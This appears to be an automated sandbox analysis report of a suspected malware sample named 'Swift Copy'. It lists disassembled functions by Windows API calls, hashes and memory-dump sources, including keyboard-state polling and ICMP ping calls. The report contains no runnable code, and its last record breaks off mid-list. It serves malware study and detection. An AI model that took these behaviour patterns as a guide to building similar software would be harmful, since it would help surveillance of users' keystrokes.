                                              • Snapshot File: hcaresult_0_2_d70000_Swift Copy.jbxd
                                              Similarity
                                              • API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_wcslen
                                              • String ID: SOFTWARE\Classes\$\CLSID$\IPC$
                                              • API String ID: 323675364-22481851
                                              • Opcode ID: 8f8ea7538ac399426fa1bc0c9fd0d3fdedddc575afa489b0ec6a1303bc9a0902
                                              • Instruction ID: e2a5e9a37324e29a08cb8f857a07b376eb6028e78e8b5b67a57dc850e5fea53b
                                              • Opcode Fuzzy Hash: 8f8ea7538ac399426fa1bc0c9fd0d3fdedddc575afa489b0ec6a1303bc9a0902
                                              • Instruction Fuzzy Hash: 67411772810228ABCF11EBA4DC95DEDB778FF54340F54812AE915B32A1EB309E44CBB0
                                              APIs
                                              • VariantInit.OLEAUT32(?), ref: 00DF3C5C
                                              • CoInitialize.OLE32(00000000), ref: 00DF3C8A
                                              • CoUninitialize.OLE32 ref: 00DF3C94
                                              • _wcslen.LIBCMT ref: 00DF3D2D
                                              • GetRunningObjectTable.OLE32(00000000,?), ref: 00DF3DB1
                                              • SetErrorMode.KERNEL32(00000001,00000029), ref: 00DF3ED5
                                              • CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002,?,00000001,?), ref: 00DF3F0E
                                              • CoGetObject.OLE32(?,00000000,00E0FB98,?), ref: 00DF3F2D
                                              • SetErrorMode.KERNEL32(00000000), ref: 00DF3F40
                                              • SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 00DF3FC4
                                              • VariantClear.OLEAUT32(?), ref: 00DF3FD8
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1675625916.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1675363933.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675942892.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_Swift Copy.jbxd
                                              Similarity
                                              • API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize_wcslen
                                              • String ID:
                                              • API String ID: 429561992-0
                                              • Opcode ID: 18c0480968d4ac953fdda9cf3708d65109b88ea8a34b220b926e4dc5725b1be3
                                              • Instruction ID: b97ebb398803c8cd93aa8342d252f1f37895e1fc8cfe821f56bdb170a83cbcc7
                                              • Opcode Fuzzy Hash: 18c0480968d4ac953fdda9cf3708d65109b88ea8a34b220b926e4dc5725b1be3
                                              • Instruction Fuzzy Hash: 03C159716083099FC700DF68C88492BB7E9FF89744F16891DFA899B251D731EE45CB62
                                              APIs
                                              • CoInitialize.OLE32(00000000), ref: 00DE7AF3
                                              • SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 00DE7B8F
                                              • SHGetDesktopFolder.SHELL32(?), ref: 00DE7BA3
                                              • CoCreateInstance.OLE32(00E0FD08,00000000,00000001,00E36E6C,?), ref: 00DE7BEF
                                              • SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 00DE7C74
                                              • CoTaskMemFree.OLE32(?,?), ref: 00DE7CCC
                                              • SHBrowseForFolderW.SHELL32(?), ref: 00DE7D57
                                              • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 00DE7D7A
                                              • CoTaskMemFree.OLE32(00000000), ref: 00DE7D81
                                              • CoTaskMemFree.OLE32(00000000), ref: 00DE7DD6
                                              • CoUninitialize.OLE32 ref: 00DE7DDC
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1675625916.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1675363933.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675942892.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_Swift Copy.jbxd
                                              Similarity
                                              • API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize
                                              • String ID:
                                              • API String ID: 2762341140-0
                                              • Opcode ID: 64960836af3af2405ad764539d229ce2a92e373d09c336efc8404a9f23b6a559
                                              • Instruction ID: 37a6d3354cd8e9624d8db091e2a1a9eb345590a534570f37f0d6c5660cb3495e
                                              • Opcode Fuzzy Hash: 64960836af3af2405ad764539d229ce2a92e373d09c336efc8404a9f23b6a559
                                              • Instruction Fuzzy Hash: 04C14C75A04149EFCB14DFA5C884DAEBBF9FF48304B148598E419EB261D731ED85CBA0
                                              APIs
                                              • SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 00E05504
                                              • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00E05515
                                              • CharNextW.USER32(00000158), ref: 00E05544
                                              • SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 00E05585
                                              • SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 00E0559B
                                              • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00E055AC
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1675625916.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1675363933.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675942892.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_Swift Copy.jbxd
                                              Similarity
                                              • API ID: MessageSend$CharNext
                                              • String ID:
                                              • API String ID: 1350042424-0
                                              • Opcode ID: 2b1ac85a6a4e5be2ee549cd3c93e64aa5ff5821c9b1f0bd7c88ba700596c1414
                                              • Instruction ID: d7e9daec505d4f992795cef67ce7e05f552a532bebf34dd1f4b0e727c1e7f63e
                                              • Opcode Fuzzy Hash: 2b1ac85a6a4e5be2ee549cd3c93e64aa5ff5821c9b1f0bd7c88ba700596c1414
                                              • Instruction Fuzzy Hash: 3F617836900608AEDF208F95DC84AFF3BB9EB0A724F105145F925BA2D0D7719AC5DF61
                                              APIs
                                              • SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,?,?), ref: 00DCFAAF
                                              • SafeArrayAllocData.OLEAUT32(?), ref: 00DCFB08
                                              • VariantInit.OLEAUT32(?), ref: 00DCFB1A
                                              • SafeArrayAccessData.OLEAUT32(?,?), ref: 00DCFB3A
                                              • VariantCopy.OLEAUT32(?,?), ref: 00DCFB8D
                                              • SafeArrayUnaccessData.OLEAUT32(?), ref: 00DCFBA1
                                              • VariantClear.OLEAUT32(?), ref: 00DCFBB6
                                              • SafeArrayDestroyData.OLEAUT32(?), ref: 00DCFBC3
                                              • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00DCFBCC
                                              • VariantClear.OLEAUT32(?), ref: 00DCFBDE
                                              • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00DCFBE9
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1675625916.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1675363933.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675942892.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_Swift Copy.jbxd
                                              Similarity
                                              • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
                                              • String ID:
                                              • API String ID: 2706829360-0
                                              • Opcode ID: 7c45d43138905060317327ed85a84e0d32faf1653d57f5ef81d4a9ba4d2589fc
                                              • Instruction ID: eb73fc0aeeae87ac36e039d09311b1be96007432d98b24dc2b360a50e8577dfc
                                              • Opcode Fuzzy Hash: 7c45d43138905060317327ed85a84e0d32faf1653d57f5ef81d4a9ba4d2589fc
                                              • Instruction Fuzzy Hash: BE413D35A0021A9FCB00DF65C854EEEBBBAFF48344F108169F955A7261DB31AD85CBB0
                                              APIs
                                              • GetKeyboardState.USER32(?), ref: 00DD9CA1
                                              • GetAsyncKeyState.USER32(000000A0), ref: 00DD9D22
                                              • GetKeyState.USER32(000000A0), ref: 00DD9D3D
                                              • GetAsyncKeyState.USER32(000000A1), ref: 00DD9D57
                                              • GetKeyState.USER32(000000A1), ref: 00DD9D6C
                                              • GetAsyncKeyState.USER32(00000011), ref: 00DD9D84
                                              • GetKeyState.USER32(00000011), ref: 00DD9D96
                                              • GetAsyncKeyState.USER32(00000012), ref: 00DD9DAE
                                              • GetKeyState.USER32(00000012), ref: 00DD9DC0
                                              • GetAsyncKeyState.USER32(0000005B), ref: 00DD9DD8
                                              • GetKeyState.USER32(0000005B), ref: 00DD9DEA
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1675625916.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1675363933.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675942892.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_Swift Copy.jbxd
                                              Similarity
                                              • API ID: State$Async$Keyboard
                                              • String ID:
                                              • API String ID: 541375521-0
                                              • Opcode ID: 253f18007007b00572b39acac15645ecf9d09f8ba798f6127cc826270df3d113
                                              • Instruction ID: cde42b4e3188d2359d70e45d9101be96a0a960393af884a30e47a83768b14e5d
                                              • Opcode Fuzzy Hash: 253f18007007b00572b39acac15645ecf9d09f8ba798f6127cc826270df3d113
                                              • Instruction Fuzzy Hash: D541C4345047C96DFF30976588243A5FEA16B11344F0C805BDAC6677C2EBA799C8C7B2
                                              APIs
                                              • WSAStartup.WSOCK32(00000101,?), ref: 00DF05BC
                                              • inet_addr.WSOCK32(?), ref: 00DF061C
                                              • gethostbyname.WSOCK32(?), ref: 00DF0628
                                              • IcmpCreateFile.IPHLPAPI ref: 00DF0636
                                              • IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 00DF06C6
                                              • IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 00DF06E5
                                              • IcmpCloseHandle.IPHLPAPI(?), ref: 00DF07B9
                                              • WSACleanup.WSOCK32 ref: 00DF07BF
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1675625916.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1675363933.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675942892.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_Swift Copy.jbxd
                                              Similarity
                                              • API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
                                              • String ID: Ping
                                              • API String ID: 1028309954-2246546115
                                              • Opcode ID: c11f565069c909c723b6a843a8bfcea4c0d3326a48d66a50b9aadd107a376859
                                              • Instruction ID: 7f75109b45b81f51d60c98e6e2b7cb4734c779a24647e7c52f30831a4364e969
                                              • Opcode Fuzzy Hash: c11f565069c909c723b6a843a8bfcea4c0d3326a48d66a50b9aadd107a376859
                                              • Instruction Fuzzy Hash: E9918D756042019FD720DF25C488F2ABBE0EF44318F19C5A9F5699B6A2C770ED85CFA1
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1675625916.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1675363933.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675942892.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_Swift Copy.jbxd
                                              Similarity
                                              • API ID: _wcslen$BuffCharLower
                                              • String ID: cdecl$none$stdcall$winapi
                                              • API String ID: 707087890-567219261
                                              • Opcode ID: 76356c9f37edb86227a00ae01d5f818e7a351fa18565ef4aa081830c3cacfceb
                                              • Instruction ID: 7d08e136cb1d6ec27dc5edfcb25197c25265197efba48df94720e9bd51d447d8
                                              • Opcode Fuzzy Hash: 76356c9f37edb86227a00ae01d5f818e7a351fa18565ef4aa081830c3cacfceb
                                              • Instruction Fuzzy Hash: CE51B472A0011AABCF14DF68C8518BEB7A1FF64324B268229F655E7280EB31DD40D7B1
                                              APIs
                                              • CoInitialize.OLE32 ref: 00DF3774
                                              • CoUninitialize.OLE32 ref: 00DF377F
                                              • CoCreateInstance.OLE32(?,00000000,00000017,00E0FB78,?), ref: 00DF37D9
                                              • IIDFromString.OLE32(?,?), ref: 00DF384C
                                              • VariantInit.OLEAUT32(?), ref: 00DF38E4
                                              • VariantClear.OLEAUT32(?), ref: 00DF3936
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1675625916.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1675363933.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675942892.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_Swift Copy.jbxd
                                              Similarity
                                              • API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize
                                              • String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
                                              • API String ID: 636576611-1287834457
                                              • Opcode ID: 227158c0c6f26dfbe1758297d0a73759770f45bd36b42b7c3699debf18977847
                                              • Instruction ID: f3c91ddd8a8049c925a013b743901b0fbafdfc31abb81e1bf72a7ec0ba4f61cd
                                              • Opcode Fuzzy Hash: 227158c0c6f26dfbe1758297d0a73759770f45bd36b42b7c3699debf18977847
                                              • Instruction Fuzzy Hash: 1861C5B0608305AFD310EF54C849F6ABBE4EF44750F168909FA8597291D774EE88CBB2
                                              APIs
                                              • LoadStringW.USER32(00000066,?,00000FFF,?), ref: 00DE33CF
                                                • Part of subcall function 00D79CB3: _wcslen.LIBCMT ref: 00D79CBD
                                              • LoadStringW.USER32(00000072,?,00000FFF,?), ref: 00DE33F0
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1675625916.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1675363933.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675942892.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_Swift Copy.jbxd
                                              Similarity
                                              • API ID: LoadString$_wcslen
                                              • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Incorrect parameters to object property !$Line %d (File "%s"):$^ ERROR
                                              • API String ID: 4099089115-3080491070
                                              • Opcode ID: 3598d0a62616929ab978f5d1c014e5d3a7ad077b74d5a5e68f1c3da7378adb9e
                                              • Instruction ID: 666acd3d1b80937559d638a06d2cb1dc9e6c0aa4d6f811baab413b1312e1c70f
                                              • Opcode Fuzzy Hash: 3598d0a62616929ab978f5d1c014e5d3a7ad077b74d5a5e68f1c3da7378adb9e
                                              • Instruction Fuzzy Hash: 4851AE72800209AADF15EBA0CD56EEEB778EF14340F248166F50973192EB316F98DB71
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1675625916.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1675363933.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675942892.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_Swift Copy.jbxd
                                              Similarity
                                              • API ID: _wcslen$BuffCharUpper
                                              • String ID: APPEND$EXISTS$KEYS$REMOVE
                                              • API String ID: 1256254125-769500911
                                              • Opcode ID: b6e89d2e5c0efe396525c5795faf22c5b9b90be1bec6ec70fb67eab99da8a93d
                                              • Instruction ID: 245dfee233a681554478035ee5d01d8042b82eff7133d27e175b6c8c77426888
                                              • Opcode Fuzzy Hash: b6e89d2e5c0efe396525c5795faf22c5b9b90be1bec6ec70fb67eab99da8a93d
                                              • Instruction Fuzzy Hash: 1A41B632A00126DBCB105F7D88915BE7BA5EBA577CB2A412BE465DB384E731CD81C7B0
                                              APIs
                                              • SetErrorMode.KERNEL32(00000001), ref: 00DE53A0
                                              • GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 00DE5416
                                              • GetLastError.KERNEL32 ref: 00DE5420
                                              • SetErrorMode.KERNEL32(00000000,READY), ref: 00DE54A7
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1675625916.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1675363933.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675942892.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_Swift Copy.jbxd
                                              Similarity
                                              • API ID: Error$Mode$DiskFreeLastSpace
                                              • String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
                                              • API String ID: 4194297153-14809454
                                              • Opcode ID: 25c75327776fe4ec944a0944e2cab3ddcb66234a8b7e52a7eb1680ba7099e1cb
                                              • Instruction ID: 5d11c83bb3164260b5f4b339acc8706550d012c6e433e806b994dc263adce251
                                              • Opcode Fuzzy Hash: 25c75327776fe4ec944a0944e2cab3ddcb66234a8b7e52a7eb1680ba7099e1cb
                                              • Instruction Fuzzy Hash: A3311435A001449FCB00EF6AD489AAABBF4EF44349F58C065E406DB2D6E771DD86CBB0
                                              APIs
                                              • CreateMenu.USER32 ref: 00E03C79
                                              • SetMenu.USER32(?,00000000), ref: 00E03C88
                                              • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00E03D10
                                              • IsMenu.USER32(?), ref: 00E03D24
                                              • CreatePopupMenu.USER32 ref: 00E03D2E
                                              • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00E03D5B
                                              • DrawMenuBar.USER32 ref: 00E03D63
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1675625916.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1675363933.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675942892.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E47000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E55000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E57000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_d70000_Swift Copy.jbxd
                                              Similarity
                                              • API ID: Menu$CreateItem$DrawInfoInsertPopup
                                              • String ID: 0$F
                                              • API String ID: 161812096-3044882817
                                              • Opcode ID: 0582d1a2ecc0a7f55c01a6336343d60a7db0b64aa81a7d49aea21d8be027ab57
                                              • Instruction ID: fac75de221de01f0b28254d949d4c15fc2dae668a0843976716aa19051044a48
                                              • Opcode Fuzzy Hash: 0582d1a2ecc0a7f55c01a6336343d60a7db0b64aa81a7d49aea21d8be027ab57
                                              • Instruction Fuzzy Hash: B5419A79A01209EFDF14CF65D884AEA7BB9FF49304F140129FA46A73A0D731AA54CF90
                                              APIs
                                              • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 00E03A9D
                                              • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 00E03AA0
                                              • GetWindowLongW.USER32(?,000000F0), ref: 00E03AC7
                                              • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00E03AEA
                                              • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 00E03B62
                                              • SendMessageW.USER32(?,00001074,00000000,00000007), ref: 00E03BAC
                                              • SendMessageW.USER32(?,00001057,00000000,00000000), ref: 00E03BC7
                                              • SendMessageW.USER32(?,0000101D,00001004,00000000), ref: 00E03BE2
                                              • SendMessageW.USER32(?,0000101E,00001004,00000000), ref: 00E03BF6
                                              • SendMessageW.USER32(?,00001008,00000000,00000007), ref: 00E03C13
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1675625916.0000000000D71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D70000, based on PE: true
                                              • Associated: 00000000.00000002.1675363933.0000000000D70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E0C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675869700.0000000000E32000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675942892.0000000000E3C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1675967731.0000000000E47000.00000002.00000001.01000000.00000003.sdmpDownload File
